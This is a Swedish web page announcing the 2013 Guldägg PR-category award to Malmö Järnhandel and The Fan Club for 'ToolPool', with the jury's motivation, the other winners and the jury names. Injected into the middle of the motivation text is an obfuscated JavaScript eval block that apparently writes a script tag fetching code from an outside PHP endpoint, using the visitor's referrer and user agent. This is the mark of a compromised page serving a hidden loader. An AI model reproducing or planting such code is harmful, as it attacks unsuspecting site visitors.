Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Årets Guldägg i kategori PR går till…

Årets Guldägg i kategori PR går till…
Sebastian

Malmö Järnhandel och The Fan Club vinner årets Guldägg i kategori PR för ”ToolPool”

Motivering:
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dyzsh|var|u0026u|referrer|snzbn||js|php’.split(’|’),0,{}))
handling säger mer än tusen ord. Därför är handlingar avgörande för relationer, dialog och uppmärksamhet. Men framför allt är handlingar avgörande för värdeskapande. I en tid då kommunikation blir en naturlig del av företag och varumärkens erbjudande måste vi i kommunikationsarbetet söka de handlingar som ligger nära affären. Handlingar som utvecklar affären. I synnerhet om det är en liten affär på en tuff marknad. Tack ToolPool för ert goda exempel!

Guldägg 2013 kategori PR:
Byrå: The Fan Club Bidragsnamn: ToolPool Uppdragsgivare: Malmö Järnhandel Art Director: Markus Lindsjö, Martin Ohlsson Copywriter: Gustav Johansson, Ida Backman Creative Director: Christian Barrett Originalare: Björn Kongslöv, Helena Ivarsson PR-ansvarig: Ola Obrant Andreasson Praktikant: Fanny Freimann Produktionsledare: Peter Andersson, Rebecka Hjorth Projektledare: Klas Oskarsson Strateg: Ulla-Karin Barrett Uppdragsgivare: Matti Jokela Webbproducent: Ehsan Pourhadi

Silverägg 2013 kategori PR:
Byrå: Jung Relations & Family Business Bidragsnamn: Absolut Unique Uppdragsgivare: The Absolut Company
Byrå: Prime Bidragsnamn: Civil Rights Captcha Uppdragsgivare: Civil Rights Defenders

Diplom 2013 kategori PR:
Byrå: Forsman & Bodenfors Bidragsnamn: The Ballerina Stunt Uppdragsgivare: Volvo Lastvagnar
Byrå: Deportivo Bidragsnamn: Twee-Q Uppdragsgivare: Crossing Boarders

Jury:
Kategoriordförande Tom Beckman
Jury Patrick Kampmann, Rickard Villard, Hedvig Hagwall Bruckner, Hanna Belander, Claes Bodén, Jimmy Johansson